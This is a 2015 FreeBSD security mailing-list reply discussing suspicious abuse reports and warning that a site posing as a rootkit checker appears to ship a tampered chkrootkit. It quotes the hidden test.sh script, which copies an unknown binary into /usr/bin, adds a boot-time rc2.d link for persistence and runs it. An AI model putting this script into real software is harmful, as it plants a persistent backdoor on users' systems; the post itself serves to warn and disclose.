From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 20:34:25 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 9CE8B2C9 for ; Wed, 25 Feb 2015 20:34:25 +0000 (UTC) Received: from mx2.nkhosting.net (mx2.nkhosting.net [109.75.177.32]) by mx1.freebsd.org (Postfix) with ESMTP id 56229393 for ; Wed, 25 Feb 2015 20:34:25 +0000 (UTC) Received: from mx2filter1.nkhosting.net (unknown [109.75.177.32]) by mx2.nkhosting.net (Postfix) with ESMTP id A5DE22D64125; Wed, 25 Feb 2015 21:34:23 +0100 (CET) X-Virus-Scanned: amavisd-new at mx2.nkhosting.net X-Spam-Flag: NO X-Spam-Score: -2.9 X-Spam-Level: X-Spam-Status: No, score=-2.9 tagged_above=-999 required=6.2 tests=[ALL_TRUSTED=-1, BAYES_00=-1.9] autolearn=ham autolearn_force=no Received: from mx2.nkhosting.net ([109.75.177.32]) by mx2filter1.nkhosting.net (mx2filter1.nkhosting.net [109.75.177.32]) (amavisd-new, port 10024) with ESMTP id e8UqxAuodkkH; Wed, 25 Feb 2015 21:34:20 +0100 (CET) Received: from air13.t19.nkhosting.net (f053177190.adsl.alicedsl.de [78.53.177.190]) by mx2.nkhosting.net (Postfix) with ESMTPSA id AB2992D631A7; Wed, 25 Feb 2015 21:34:20 +0100 (CET) Content-Type: text/plain; charset=us-ascii Mime-Version: 1.0 (Mac OS X Mail 8.1 \(1993\)) Subject: Re: has my 10.1-RELEASE system been compromised From: Philip Jocks In-Reply-To: <86k2z5yc03.fsf@gly.ftfl.ca> Date: Wed, 25 Feb 2015 21:34:21 +0100 Content-Transfer-Encoding: quoted-printable Message-Id: <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> To: Joseph Mingrone X-Mailer: Apple Mail (2.1993) Cc: freebsd-security@freebsd.org X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 20:34:25 -0000 > Am 25.02.2015 um 21:25 schrieb Joseph Mingrone : >=20 > Philip Jocks writes: >> are those the only lines they sent you? Weirdly, we got a report like = this today >> as well with the first (out of 8) sample line showing the exact time = stamp >> (23/Feb/2015:14:53:37 +0100) and the exact query string >> (/?cmd=3Dinfo&key=3Df8184c819717b6815a8b8037e91c59ef&ip=3D212.97.34.7) = which makes it >> a bit strange to be a coincidence. There is a webserver running in a = jail on the >> reported IP address, but I can't find any log lines on our side that = could be >> related. >> We asked the email.it folks for details, but haven't heard back from = them yet. >>=20 >> Philip >=20 > Interesting. Yes, they sent nearly the same line about 8 times with = the timestamps a > second or two apart. What other daemons are you running on that host? > Something other than the webserver could be compromised. >=20 > Please share if you hear anything from email.it. >=20 > Joseph it felt pretty scammy to me, googling for the "worm" got me to = rkcheck.org which was registered a few days ago and looks like a = tampered version of chkrootkit. I hope, nobody installed it anywhere, it = seems to execute rkcheck/tests/.unit/test.sh which contains=20 #!/bin/bash cp tests/.unit/test /usr/bin/rrsyncn chmod +x /usr/bin/rrsyncn rm -fr /etc/rc2.d/S98rsyncn ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn /usr/bin/rrsyncn exit That doesn't look like something you'd want on your box... Cheers, Philip